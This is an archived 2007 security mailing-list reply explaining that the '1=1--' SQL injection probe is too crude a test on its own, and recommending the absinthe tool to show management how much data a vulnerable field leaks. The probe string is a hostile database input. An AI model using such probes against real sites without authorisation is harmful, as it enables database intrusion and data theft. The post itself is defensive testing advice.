WebApp Sec mailing list archives
Re: SQL Injection and XSS testing,
From: "Jason Ross" <algorythm () gmail com>
Date: Sat, 24 Feb 2007 22:09:53 -0500
On 2/23/07, IRM <irm () iinet net au> wrote:
Excuse me for this basic question. Just wondering in regards to the SQL injection, is it sufficient to insert the input with "1=1--" to test whether a site is vulnerable to the SQL injection?
absolutely not. for one thing, there umpty-zillion different variations of "1=1--" , some of which may work where others do not, depending on: a) the backend dbms, and b) the code in the application and c) some third thing i'm sure i've forgotten to mention apart from that however, there are a number of other ways to inject sql into an application which may work where a simple 1=1 fails. That said, performing 1=1 tests can be a fairly useful first pass, in that you are likely to reveal some "low hanging fruit" so to speak; but it should by no means be the only thing done before slapping a "not injectable" on the app (of course, i'm not sure i'm comfortable saying *any* app that talks to a dbms is "not injectable" ... perhaps "not trivially injectable" ;-) )
If I am not wrong I guess most of the security aspects in Web application are mainly around input validation.
I'd tend to agree with this statement, emphasizing that "most" implies that input validation is by no means the only aspect to consider.
So I was wondering is there any free open source software to automate all the input?
I highly recommend checking out absinthe. I find it useful for a number of things, one of them being providing management with a solid idea of exactly how much data one can obtain via an application which is vulnerable. I've found it does very little to provide someone with a screenshot of "1=1" with a sql error on the page (or even a successful login as the first user in the database for that matter, sadly.) Providing them a spreadsheet containing all (or a good portion) of the data in the database, along with a documented schema, all gained from a single vulnerable input field, that tends to have the desired effect of "um, we should fix that" =)
Or maybe a list of stuff that usually need to test? Say SQL Injection or XSS?
I don't have a cheat sheet link, but wanted to note (the obvious perhaps) that these are two very different things... -- Jason Ross ------------------------------------------------------------------------- Sponsored by: WatchfireSecuring a web application goes far beyond testing the application using manual processes, or by using automated systems and tools. Watchfire's "Web Application Security: Automated Scanning or Manual Penetration Testing?" whitepaper examines a few vulnerability detection methods - specifically comparing and contrasting manual penetration testing with automated scanning tools. Download it today!
https://www.watchfire.com/securearea/whitepapers.aspx?id=701500000008fH6 --------------------------------------------------------------------------
Current thread:
- SQL Injection and XSS testing, IRM (Feb 24)
- RE: SQL Injection and XSS testing, WebAppSec (Feb 25)
- Re: SQL Injection and XSS testing, Josh Zlatin-Amishav (Feb 25)
- Re: SQL Injection and XSS testing, Jason Ross (Feb 25)
- Re: SQL Injection and XSS testing, Matteo Meucci (Feb 25)
- Re: SQL Injection and XSS testing, crazy frog crazy frog (Feb 25)
- RE: SQL Injection and XSS testing, James Ash (Feb 25)
- <Possible follow-ups>
- Re: SQL Injection and XSS testing, eugk . 46247649 (Feb 25)
- Re: SQL Injection and XSS testing, Henry Troup (Feb 25)